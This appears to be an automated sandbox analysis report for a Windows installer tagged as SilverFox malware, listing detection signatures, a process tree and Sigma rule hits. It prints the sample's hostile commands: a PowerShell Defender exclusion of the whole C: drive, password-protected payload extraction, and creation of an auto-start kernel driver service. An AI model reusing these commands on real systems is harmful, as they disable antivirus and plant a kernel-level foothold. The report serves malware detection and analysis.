
Windows Analysis Report
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe

Overview

General Information

Sample name: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe (renamed because original name is a hash value)
Original sample name: _1.0.4.exe
Analysis ID: 1579419
MD5: 44728e21199d2b04a4b25798625ac86e
SHA1: 382e29a97bb8a34a3164f7464692f16e3526bb1c
SHA256: 4cd9b5ec751ac76c5e71d500cd4592dbd4fc7ce4e88ea0187fbc04e66f976cc5
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe (PID: 6700 cmdline: "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" MD5: 44728E21199D2B04A4B25798625AC86E)
    • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp (PID: 6768 cmdline: "C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
      • powershell.exe (PID: 2312 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7080 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT MD5: 44728E21199D2B04A4B25798625AC86E)
        • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp (PID: 1068 cmdline: "C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043C,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
          • 7zr.exe (PID: 6024 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 1440 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1440 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 5260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • cmd.exe (PID: 6024 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6024 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 5928 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3496 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6792 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2212 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4604 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1516 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3496 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6792 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 5172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 3220 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2160 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6168 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5476 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3496 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1516 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6504 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6792 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2736 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4604 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2160 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2672 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2736 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6700 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6744 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1236 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4428 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2996 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6744 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6792 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1136 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2736 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2720 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6768 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1136 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3220 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1216 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4476 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2284 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2304 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2124 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6792 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2680 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2916 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5856 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6044 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4080 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5688 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2720 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1712 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2672 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2916 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2792 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3736 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ParentProcessId: 6768, ParentProcessName: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2312, ProcessName: powershell.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5928, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3496, ProcessName: sc.exe
Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ParentProcessId: 6768, ParentProcessName: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2312, ProcessName: powershell.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5928, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3496, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ParentProcessId: 6768, ParentProcessName: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2312, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 83.3% probability
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1892309126.0000000003110000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1892434905.0000000003310000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA098B0 FindFirstFileA,FindClose,FindClose,6_2_6CA098B0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00186868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_00186868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00187496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_00187496
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
